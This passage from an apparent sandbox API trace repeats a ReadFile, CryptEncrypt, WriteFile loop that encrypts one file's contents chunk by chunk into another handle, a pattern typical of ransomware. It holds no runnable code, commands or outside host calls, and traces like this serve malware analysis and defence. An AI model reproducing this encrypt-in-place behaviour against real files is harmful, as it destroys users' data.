lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.785] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.785] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.785] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.787] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.788] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.790] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.791] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] CryptEncrypt (in: 